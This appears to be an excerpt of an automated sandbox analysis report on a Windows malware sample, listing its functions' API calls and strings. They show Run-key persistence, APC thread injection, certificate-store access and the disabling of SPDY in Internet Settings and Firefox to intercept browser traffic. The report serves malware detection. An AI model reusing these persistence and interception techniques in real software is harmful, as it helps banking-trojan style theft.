RegCreateKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,00000000), ref: 05404FF1
StrRChrA.SHLWAPI(00000000,00000000,00000000), ref: 05405009
lstrlen.KERNEL32(00000000), ref: 05405013
RegSetValueExA.ADVAPI32(00000001,00000001,00000000,00000001,00000000,00000001), ref: 05405023
RegCloseKey.ADVAPI32(?), ref: 0540502F
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000), ref: 0540503D

Strings

%lu.exe, xrefs: 05404FB7
Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 05404FE7

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: HeapPathTemp$AllocateCloseCountCreateFreeHeaderImageTickValuelstrlenwsprintf
String ID: %lu.exe$Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 3778301466-2576086316
Opcode ID: d0f46a1a20f6037febb4536669aa2b04dd1f28ccfc03526f90a7c81704a79115
Instruction ID: ce8101cb6893e22b416f036f183033bfbd9bb4726343868f1e0d2ec32c00d58d
Opcode Fuzzy Hash: d0f46a1a20f6037febb4536669aa2b04dd1f28ccfc03526f90a7c81704a79115
Instruction Fuzzy Hash: A9215771811228BFDB259FA1DC89DEF7F6CEF45390BA04026FA05D2140DA718E42DEA0

Uniqueness

Uniqueness Score: -1.00%

Function 0541C994, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 188memorystringthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 05407AFD: RtlAllocateHeap.NTDLL(00000000,00000105,00000000), ref: 05407B42
Part of subcall function 05407AFD: RtlAllocateHeap.NTDLL(00000000,00000105), ref: 05407B5A
Part of subcall function 05407AFD: WaitForSingleObject.KERNEL32(00000000), ref: 05407C20
Part of subcall function 05407AFD: HeapFree.KERNEL32(00000000,?), ref: 05407C49
Part of subcall function 05407AFD: HeapFree.KERNEL32(00000000,?), ref: 05407C59
Part of subcall function 05407AFD: RegCloseKey.ADVAPI32(?), ref: 05407C62

lstrcmp.KERNEL32(?,?), ref: 0541CA0B
HeapFree.KERNEL32(00000000,?), ref: 0541CA37
GetCurrentThreadId.KERNEL32 ref: 0541CADD
GetCurrentThread.KERNEL32 ref: 0541CAEE
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,Function_00006F35,?,00000001), ref: 0541CB2B
HeapFree.KERNEL32(00000000,?,?,00000000,?,Function_00006F35,?,00000001), ref: 0541CB3F
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 0541CB4D
wsprintfA.USER32 ref: 0541CB5E
lstrlen.KERNEL32(00000000,00000000), ref: 0541CB69

Part of subcall function 054150DA: lstrlen.KERNEL32(00000000,00000000,00000000,00000008,0541A6CC,00000000,00000000,00000000,00000020,00000000,?,05425798,00000020,00000000,?,00000000), ref: 054150E4
Part of subcall function 054150DA: lstrcpy.KERNEL32(00000000,00000000), ref: 05415108
Part of subcall function 054150DA: StrRChrA.SHLWAPI(00000000,00000000,0000002E,?,00000003,?,05425798,00000020,00000000,?,00000000,?,00000000,00000000), ref: 0541510F
Part of subcall function 054150DA: lstrcat.KERNEL32(00000000,?), ref: 05415166

HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 0541CB83
HeapFree.KERNEL32(00000000,00000000), ref: 0541CB94
HeapFree.KERNEL32(00000000,?), ref: 0541CBA0

Strings

DLL load status: %u, xrefs: 0541CB58

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Allocate$CurrentThreadlstrlen$CloseObjectSingleWaitlstrcatlstrcmplstrcpywsprintf
String ID: DLL load status: %u
API String ID: 773763258-2598350583
Opcode ID: 14fca27a8fe0c14882d3496b208edd09def9935106ee2933e4ec11dc29bc1b4a
Instruction ID: 1f2450161b80522110e1c24098b7428062212ff8e4c7b81d2a3250e344bc37dc
Opcode Fuzzy Hash: 14fca27a8fe0c14882d3496b208edd09def9935106ee2933e4ec11dc29bc1b4a
Instruction Fuzzy Hash: EA71F471910229EFCB21DFA5DC89EEEBFB5FB08340F54406AE905A3260DB309952DF94

Uniqueness

Uniqueness Score: -1.00%

Function 05421ECA, Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 149stringCOMMON

Download Yara Rule

APIs

Part of subcall function 054203DD: RtlAllocateHeap.NTDLL(00000000,00000001,054211E1), ref: 054203E9

memset.NTDLL ref: 05421EF8
StrChrA.SHLWAPI(?,0000000D), ref: 05421F3E
StrChrA.SHLWAPI(?,0000000A), ref: 05421F4B
StrChrA.SHLWAPI(?,0000007C), ref: 05421F72
StrTrimA.SHLWAPI(?,0542A4A4), ref: 05421F87
StrChrA.SHLWAPI(?,0000003D), ref: 05421F90
StrTrimA.SHLWAPI(00000001,0542A4A4), ref: 05421FA6
_strupr.NTDLL ref: 05421FAD
StrTrimA.SHLWAPI(?,?), ref: 05421FBA
memcpy.NTDLL(00000000,00000000,-00000008,-00000020,00000000,-00000020), ref: 05422002
lstrlen.KERNEL32(?,00000000,?,?,?,00000001,?,00000000,?), ref: 05422021

Strings

, xrefs: 05421FB2
;, xrefs: 05421F60

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Trim$AllocateHeap_struprlstrlenmemcpymemset
String ID: $;
API String ID: 4019332941-73438061
Opcode ID: 94a0a967c0aa10c60469cf2e811e31f6760f1260d192244873060aae2dded435
Instruction ID: 0a79fab6611a09c124f22c3dab60fe3a4d8aacf99df4ad9cd19066a306d6d7d1
Opcode Fuzzy Hash: 94a0a967c0aa10c60469cf2e811e31f6760f1260d192244873060aae2dded435
Instruction Fuzzy Hash: 5541F27160C3359FD720DF298844BABBBE8BF49600F84045EF99AD7241DBB4D505CB62

Uniqueness

Uniqueness Score: -1.00%

Function 05415174, Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 134stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,75145520,?,00000000,?,?,05401EA7), ref: 0541518D
lstrlen.KERNEL32(05401EA7), ref: 05415193
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 054151A3
lstrcpy.KERNEL32(00000000,05401EA7), ref: 054151BD
lstrlen.KERNEL32(?), ref: 054151D5
lstrlen.KERNEL32(?), ref: 054151E3
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?), ref: 05415231
lstrlen.KERNEL32(00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 05415255
lstrlen.KERNEL32(?), ref: 05415283
HeapFree.KERNEL32(00000000,?,?), ref: 054152AE
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,?,?,00000000,?,?,?,?), ref: 054152C5
HeapFree.KERNEL32(00000000,?,?), ref: 054152D2

Strings

http, xrefs: 0541525C, 0541526C

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Heap$Free$Allocatelstrcpy
String ID: http
API String ID: 904523553-2541227442
Opcode ID: 504b87554d439e748630d9eb1029693d1fd4c9023d9f4e8edcf408ecef91213b
Instruction ID: a34b81de4c53a5058f3cab2ac7d952b3c721042347c5313d7db6e4aa2b582d11
Opcode Fuzzy Hash: 504b87554d439e748630d9eb1029693d1fd4c9023d9f4e8edcf408ecef91213b
Instruction Fuzzy Hash: 69416A72A00219BFDF26DFA5CC84EEE7BB9FB48340F1040A6F9159A250DB709910CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0542264B, Relevance: 21.2, APIs: 14, Instructions: 205memorystringthreadCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(?,0000002C), ref: 0542269A
StrTrimA.SHLWAPI(00000001,20000920), ref: 054226B3
StrChrA.SHLWAPI(?,0000002C), ref: 054226BE
StrTrimA.SHLWAPI(00000001,20000920), ref: 054226D7
lstrlen.KERNEL32(?), ref: 05422780
RtlAllocateHeap.NTDLL(00000000,?), ref: 054227A2
lstrcpy.KERNEL32(00000020,?), ref: 054227C1
lstrlen.KERNEL32(?), ref: 054227CB
memcpy.NTDLL(?,?,?), ref: 0542280C
memcpy.NTDLL(?,?,?), ref: 0542281F
SwitchToThread.KERNEL32(?,00000000,?,?), ref: 05422843
HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,?), ref: 05422862
HeapFree.KERNEL32(00000000,?), ref: 05422888
HeapFree.KERNEL32(00000000,?), ref: 054228A4

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$Trimlstrlenmemcpy$AllocateSwitchThreadlstrcpy
String ID:
API String ID: 3323474148-0
Opcode ID: 809d97acbea09e1d4b7041f87b1b5b8d185567c74cee023341c84bd0860fea0e
Instruction ID: 6cdea98f4449cdefaa61c4e5364654436fccdb2d4f4bc5e46a3a3fe4c4f2c7af
Opcode Fuzzy Hash: 809d97acbea09e1d4b7041f87b1b5b8d185567c74cee023341c84bd0860fea0e
Instruction Fuzzy Hash: 74717C36508321AFC721DF25C845BEBBBE8BF88304F44492EF599E2250DBB4D645CB92

Uniqueness

Uniqueness Score: -1.00%

Function 05425706, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 114memorythreadstringCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(00000000), ref: 0542572A
GetCurrentThreadId.KERNEL32 ref: 05425740
GetCurrentThread.KERNEL32 ref: 05425751

Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD5E
Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD77
Part of subcall function 0540DD4C: GetCurrentThreadId.KERNEL32 ref: 0540DD84
Part of subcall function 0540DD4C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD90
Part of subcall function 0540DD4C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD9E
Part of subcall function 0540DD4C: lstrcpy.KERNEL32(00000000), ref: 0540DDC0

Part of subcall function 0541A6B0: lstrlen.KERNEL32(00000000,00000001,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,05425798,00000020,00000000,?,00000000), ref: 0541A71B
Part of subcall function 0541A6B0: HeapFree.KERNEL32(00000000,00000000,00000000,00000000,?,00000001,00000000,00000000,00000020,00000000,?,05425798,00000020,00000000,?,00000000), ref: 0541A743

HeapFree.KERNEL32(00000000,?,00000020,?,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 054257C6
HeapFree.KERNEL32(00000000,?,00000020,00000000,?,00000000,?,00000000,00000000,?), ref: 054257D6
RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 05425822
wsprintfA.USER32 ref: 05425833
lstrlen.KERNEL32(00000000,00000000), ref: 0542583E
HeapFree.KERNEL32(00000000,00000000,0000010D,00000000,00000000), ref: 05425858

Strings

PluginRegisterCallbacks, xrefs: 054257E2
DLL load status: %u, xrefs: 0542582D
W, xrefs: 0542580F

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$CurrentTempThread$FilePathTimelstrlen$AllocateHeaderImageNameSystemlstrcpywsprintf
String ID: DLL load status: %u$PluginRegisterCallbacks$W
API String ID: 630447368-2893651616
Opcode ID: cc6ff84ee0e10a01e5911f9386d100a7dc7929fa02bf36315451b6e1c41f6e00
Instruction ID: e57fe49c61d9b132331013850d2febb7639055640884b372d2cbe66d94593442
Opcode Fuzzy Hash: cc6ff84ee0e10a01e5911f9386d100a7dc7929fa02bf36315451b6e1c41f6e00
Instruction Fuzzy Hash: 62418A30911235FBCB21AFA2DC899EF7F79FF44680F50802AF905A6650DB708661CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 05403369, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 101registrymemorystringCOMMON

Download Yara Rule

APIs

RegOpenKeyA.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run,?), ref: 05403385

Part of subcall function 054242E5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,00000000,80000001,?,?,?,?,054033AA,00000000,00000000,00000000), ref: 0542430C
Part of subcall function 054242E5: RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,?,?,054033AA,00000000,00000000,00000000), ref: 05424335
Part of subcall function 054242E5: RegCloseKey.ADVAPI32(?,?,?,054033AA,00000000,00000000,00000000,00000000), ref: 0542436C

lstrcmpiW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 054033BD
lstrlenW.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 054033CE
RegCreateKeyA.ADVAPI32(80000001,54464F53,?), ref: 05403409
RegSetValueExA.ADVAPI32(00000000,72617453,00000000,00000004,?,00000004), ref: 0540342B
RegCloseKey.ADVAPI32(?), ref: 05403434
RtlEnterCriticalSection.NTDLL(00000000), ref: 0540344A
HeapFree.KERNEL32(00000000,?), ref: 0540345F
RtlLeaveCriticalSection.NTDLL(00000000), ref: 0540346F
HeapFree.KERNEL32(00000000,?), ref: 05403484
RegCloseKey.ADVAPI32(?), ref: 05403489

Strings

Software\Microsoft\Windows\CurrentVersion\Run, xrefs: 05403375

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: CloseValue$CriticalFreeHeapQuerySection$CreateEnterLeaveOpenlstrcmpilstrlen
String ID: Software\Microsoft\Windows\CurrentVersion\Run
API String ID: 3028791806-1428018034
Opcode ID: e0709b70b8b8113f0dc43ed3049da463b7d46150a831f6b3e89787533b42051a
Instruction ID: fc237ba514b6cb633900a611b5faaf0819ca2d09992793957566315e1844bfb9
Opcode Fuzzy Hash: e0709b70b8b8113f0dc43ed3049da463b7d46150a831f6b3e89787533b42051a
Instruction Fuzzy Hash: D1317771910128FFCB259F95DC49CEEBFBAFB44300B908466F505E6160DB318A51EF64

Uniqueness

Uniqueness Score: -1.00%

Function 0541E0C4, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 78memoryfileCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00000104,00000000), ref: 0541E0DB
GetWindowsDirectoryA.KERNEL32(00000000,00000104,?,00000000,?,054179AF,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 0541E0ED
StrChrA.SHLWAPI(00000000,0000003A,?,00000000,?,054179AF,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 0541E0FA
wsprintfA.USER32 ref: 0541E10E
CreateFileA.KERNEL32(00000002,C0000000,00000003,00000000,00000003,00000000,00000000,00000000,00000000,?,00000000,00000094,00000000), ref: 0541E124
GetModuleHandleA.KERNEL32(00000000,00010000,?,00000000), ref: 0541E13D
WriteFile.KERNEL32(00000000,00000000), ref: 0541E145
GetLastError.KERNEL32 ref: 0541E153
CloseHandle.KERNEL32(00000000), ref: 0541E15C
GetLastError.KERNEL32(?,00000000,?,054179AF,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 0541E16D
HeapFree.KERNEL32(00000000,00000000,?,00000000,?,054179AF,00000094,00000000,00000001,00000094,00000000,00000000,?,00000000,00000094,00000000), ref: 0541E17D

Strings

\\.\%s, xrefs: 0541E108

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileHandleHeapLast$AllocateCloseCreateDirectoryFreeModuleWindowsWritewsprintf
String ID: \\.\%s
API String ID: 3873609385-869905501
Opcode ID: d3d5b0cf46c9eca2db6bfb1126a7396bd7df9fb4d22965bd93a1d54d620d2180
Instruction ID: 8aa20893c1677356b8c3d76141b4a2c48cbc5d590767551ad02eedd103e8e260
Opcode Fuzzy Hash: d3d5b0cf46c9eca2db6bfb1126a7396bd7df9fb4d22965bd93a1d54d620d2180
Instruction Fuzzy Hash: B811D371154338BFE2342A60AC8EEFF3E6CEB06695F410165FD06D6180DE600C1285B6

Uniqueness

Uniqueness Score: -1.00%

Function 05414397, Relevance: 21.1, APIs: 5, Strings: 7, Instructions: 65filememoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD5E
Part of subcall function 0540DD4C: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD77
Part of subcall function 0540DD4C: GetCurrentThreadId.KERNEL32 ref: 0540DD84
Part of subcall function 0540DD4C: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD90
Part of subcall function 0540DD4C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,0542577F,00000000,?,00000000,00000000,?), ref: 0540DD9E
Part of subcall function 0540DD4C: lstrcpy.KERNEL32(00000000), ref: 0540DDC0

DeleteFileA.KERNEL32(00000000,000004D2), ref: 054143BA
CreateDirectoryA.KERNEL32(00000000,00000000), ref: 054143C3
GetLastError.KERNEL32 ref: 054143CD
HeapFree.KERNEL32(00000000,00000000), ref: 05414451

Strings

TrustedPeople, xrefs: 0541441A
TrustedPublisher, xrefs: 05414425
CertificateAuthority, xrefs: 054143F9
Root, xrefs: 0541440F
AuthRoot, xrefs: 054143EE
Disallowed, xrefs: 05414404
AddressBook, xrefs: 054143E3

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$PathTime$CreateCurrentDeleteDirectoryErrorFreeHeapLastNameSystemThreadlstrcpy
String ID: AddressBook$AuthRoot$CertificateAuthority$Disallowed$Root$TrustedPeople$TrustedPublisher
API String ID: 3543646443-3095660563
Opcode ID: f803a363e082b5edb9fc5175011cc9ecfecd9fa0e15f3d21b2de004727f33327
Instruction ID: a24369820a394806aafa1adbd35f4fa2ca30625d633c09c8b1fe2f47edc3a124
Opcode Fuzzy Hash: f803a363e082b5edb9fc5175011cc9ecfecd9fa0e15f3d21b2de004727f33327
Instruction Fuzzy Hash: C3015E3939722072D6343AA36E0FFDF2D68DF56AA5F21015BBA0CE11906DA8440191BE

Uniqueness

Uniqueness Score: -1.00%

Function 0541EA8D, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 65threadprocesslibraryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,7519F5B0,0540CF17,61636F4C,00000001,?,?), ref: 0541EAB3
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 0541EABF
GetModuleHandleA.KERNEL32(KERNEL32.DLL,ExitProcess,?,00000000,00000000), ref: 0541EAD6
GetProcAddress.KERNEL32(00000000), ref: 0541EADD
Thread32First.KERNEL32(?,0000001C), ref: 0541EAED
OpenThread.KERNEL32(001F03FF,00000000,0540CF17), ref: 0541EB08
QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 0541EB19
CloseHandle.KERNEL32(00000000), ref: 0541EB20
Thread32Next.KERNEL32(?,0000001C), ref: 0541EB29
CloseHandle.KERNEL32(?), ref: 0541EB35

Strings

KERNEL32.DLL, xrefs: 0541EAD1
ExitProcess, xrefs: 0541EACC

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID: ExitProcess$KERNEL32.DLL
API String ID: 2341152533-108369947
Opcode ID: 6c8bc78a91a6f629d67a29eac6beac6ec5f9e78a5700b72d4531fd307a8511e8
Instruction ID: 90dfc647849082fa7b5c6a2a843855559cbe35699fca5f7c7dec460c62e56d17
Opcode Fuzzy Hash: 6c8bc78a91a6f629d67a29eac6beac6ec5f9e78a5700b72d4531fd307a8511e8
Instruction Fuzzy Hash: 48117C75900228AFDF11AFA1DC8ADEE7F7DFF08291B40412AFE02A2190CB309955DB65

Uniqueness

Uniqueness Score: -1.00%

Function 054051A3, Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 124memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 054210F6: RtlEnterCriticalSection.NTDLL(0542E288), ref: 054210FE
Part of subcall function 054210F6: RtlLeaveCriticalSection.NTDLL(0542E288), ref: 05421113
Part of subcall function 054210F6: InterlockedIncrement.KERNEL32(0000001C), ref: 0542112C

RtlAllocateHeap.NTDLL(00000000,00000018,Blocked), ref: 054051D9
memset.NTDLL ref: 054051EA
lstrcmpi.KERNEL32(?,?), ref: 0540522A
RtlAllocateHeap.NTDLL(00000000,?), ref: 05405253
memcpy.NTDLL(00000000,?,?), ref: 05405267
memset.NTDLL ref: 05405274
memcpy.NTDLL(?,?,?,?,00000000,?,00000000,?,?), ref: 0540528D
memcpy.NTDLL(-00000005,HIDDEN,00000007,?,?,?,?,00000000,?,00000000,?,?), ref: 054052A8
HeapFree.KERNEL32(00000000,?), ref: 054052C5

Strings

Blocked, xrefs: 054051AC, 054052D5
HIDDEN, xrefs: 054052A2

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: Heapmemcpy$AllocateCriticalSectionmemset$EnterFreeIncrementInterlockedLeavelstrcmpi
String ID: Blocked$HIDDEN
API String ID: 694413484-4010945860
Opcode ID: 557a5a24519c08b493175c6c78bd227d10eb5a4d777bc3ee18294150bf85ea6c
Instruction ID: c874a3550741eccdbbc2a0079369e797d361813579cf0105b6e0069602fa8e49
Opcode Fuzzy Hash: 557a5a24519c08b493175c6c78bd227d10eb5a4d777bc3ee18294150bf85ea6c
Instruction Fuzzy Hash: B641B071E00219AFDB209FA5CC45BDEBBB5FF04354F60407AE915A7280DB709A059F54

Uniqueness

Uniqueness Score: -1.00%

Function 054260F6, Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 113registrysynchronizationthreadCOMMON

Download Yara Rule

APIs

Part of subcall function 05415518: lstrlenW.KERNEL32(?,?,00000000,?,00000250,?,77A31120), ref: 05415564
Part of subcall function 05415518: lstrlenW.KERNEL32(?,?,77A31120), ref: 05415570
Part of subcall function 05415518: memset.NTDLL ref: 054155B8
Part of subcall function 05415518: FindFirstFileW.KERNEL32(00000000,00000000), ref: 054155D3
Part of subcall function 05415518: lstrlenW.KERNEL32(0000002C), ref: 0541560B
Part of subcall function 05415518: lstrlenW.KERNEL32(?), ref: 05415613
Part of subcall function 05415518: memset.NTDLL ref: 05415636
Part of subcall function 05415518: wcscpy.NTDLL ref: 05415648

WaitForSingleObject.KERNEL32(00000000,%APPDATA%\Mozilla\Firefox\Profiles,prefs.js,?,00000000,00000000,00000001), ref: 05426189
RegOpenKeyA.ADVAPI32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings,?), ref: 054261B8
RegSetValueExA.ADVAPI32(?,EnableSPDY3_0,00000000,00000004,00000000,00000004), ref: 054261D4
RegCloseKey.ADVAPI32(?), ref: 054261DD
WaitForSingleObject.KERNEL32(00000000), ref: 05426215
RtlExitUserThread.NTDLL(?), ref: 0542624F

Part of subcall function 0540B3ED: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000008,00000000,00000000,?,?,05411ABF,00000000,?,?), ref: 0540B40B
Part of subcall function 0540B3ED: GetFileSize.KERNEL32(00000000,00000000,?,?,05411ABF,00000000,?,?,?,054160B5,75145519,05405E05,75145519,?,00000000), ref: 0540B41B
Part of subcall function 0540B3ED: CloseHandle.KERNEL32(000000FF,?,?,05411ABF,00000000,?,?,?,054160B5,75145519,05405E05,75145519,?,00000000,?,05404731), ref: 0540B47D

Part of subcall function 0540976C: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,0540E69C), ref: 054097AD
Part of subcall function 0540976C: GetLastError.KERNEL32 ref: 054097B7
Part of subcall function 0540976C: WaitForSingleObject.KERNEL32(000000C8), ref: 054097DC
Part of subcall function 0540976C: CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 054097FD
Part of subcall function 0540976C: SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 05409825
Part of subcall function 0540976C: WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 0540983A
Part of subcall function 0540976C: SetEndOfFile.KERNEL32(00000006), ref: 05409847
Part of subcall function 0540976C: CloseHandle.KERNEL32(00000006), ref: 0540985F

Strings

SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings, xrefs: 054261AE
EnableSPDY3_0, xrefs: 054261CC
%APPDATA%\Mozilla\Firefox\Profiles, xrefs: 05426113
user_pref("network.http.spdy.enabled", false);, xrefs: 05426141, 05426157
prefs.js, xrefs: 0542610E

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: File$lstrlen$CloseCreateObjectSingleWait$Handlememset$ErrorExitFindFirstLastOpenPointerSizeThreadUserValueWritewcscpy
String ID: user_pref("network.http.spdy.enabled", false);$%APPDATA%\Mozilla\Firefox\Profiles$EnableSPDY3_0$SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings$prefs.js
API String ID: 90276831-3405794569
Opcode ID: c4fd81a85bf4353af3e66722173fe9b3e8e4c674b8a1d1d8439876de20a9874d
Instruction ID: 069af218a14b289408b40eb9ab34f1eb35caff68fba819a692d3bafc92379637
Opcode Fuzzy Hash: c4fd81a85bf4353af3e66722173fe9b3e8e4c674b8a1d1d8439876de20a9874d
Instruction Fuzzy Hash: 75418471E00234BBDB249B61CC86FEE7B79BB04700F914066F514B3290DB70AA419B65

Uniqueness

Uniqueness Score: -1.00%

Function 0540B30C, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 76stringfilememoryCOMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 0540B31C
CreateFileW.KERNEL32(054177B2,80000000,00000003,0542E0E4,00000003,00000000,00000000,?,054177B2,?,00000000,?,00000000), ref: 0540B339
GetLastError.KERNEL32(?,054177B2,?,00000000,?,00000000), ref: 0540B3DA

Part of subcall function 05406DF5: lstrlen.KERNEL32(?,00000000,0540B35A,00000027,0542E0E4,?,00000000,?,?,0540B35A,Local\,00000001,?,054177B2,?,00000000), ref: 05406E2B
Part of subcall function 05406DF5: lstrcpy.KERNEL32(00000000,00000000), ref: 05406E4F
Part of subcall function 05406DF5: lstrcat.KERNEL32(00000000,00000000), ref: 05406E57

GetFileSize.KERNEL32(054177B2,00000000,Local\,00000001,?,054177B2,?,00000000,?,00000000), ref: 0540B365
CreateFileMappingA.KERNEL32(054177B2,0542E0E4,00000002,00000000,00000000,054177B2), ref: 0540B379
lstrlen.KERNEL32(054177B2,?,054177B2,?,00000000,?,00000000), ref: 0540B395
lstrcpy.KERNEL32(?,054177B2), ref: 0540B3A5
GetLastError.KERNEL32(?,054177B2,?,00000000,?,00000000), ref: 0540B3AD
HeapFree.KERNEL32(00000000,054177B2,?,054177B2,?,00000000,?,00000000), ref: 0540B3C0
CloseHandle.KERNEL32(054177B2,Local\,00000001,?,054177B2), ref: 0540B3D2

Strings

Local\, xrefs: 0540B34D

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

Yara matches

Similarity

API ID: File$CreateErrorLastlstrcpylstrlen$CloseCountFreeHandleHeapMappingSizeTicklstrcat
String ID: Local\
API String ID: 194907169-422136742
Opcode ID: 735a7be2437be7caec67851ffd091b6f771003bcd648a453dbbe75ba63039e94
Instruction ID: 489820d5040cf8f713c022a4d44c02c11d6268e76befae834152d8439984d06c
Opcode Fuzzy Hash: 735a7be2437be7caec67851ffd091b6f771003bcd648a453dbbe75ba63039e94
Instruction Fuzzy Hash: 8C216B70800318FFDB209FA4D849ADEBFB9FF04350F60846AF506E2290CB748A51DB61

Uniqueness

Uniqueness Score: -1.00%

Function 05419803, Relevance: 18.2, APIs: 12, Instructions: 179synchronizationstringthreadCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 0541982A
memcpy.NTDLL(?,?,00000010), ref: 0541984D
memset.NTDLL ref: 05419899
lstrcpyn.KERNEL32(?,?,00000034), ref: 054198AD
GetLastError.KERNEL32 ref: 054198DB
GetLastError.KERNEL32 ref: 0541991E
GetLastError.KERNEL32 ref: 0541993D
WaitForSingleObject.KERNEL32(?,000927C0), ref: 05419977
WaitForSingleObject.KERNEL32(?,00000000), ref: 05419985
GetLastError.KERNEL32 ref: 054199FA
ReleaseMutex.KERNEL32(?), ref: 05419A0C
RtlExitUserThread.NTDLL(?), ref: 05419A22

Memory Dump Source

Source File: 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, Offset: 05400000, based on PE: false

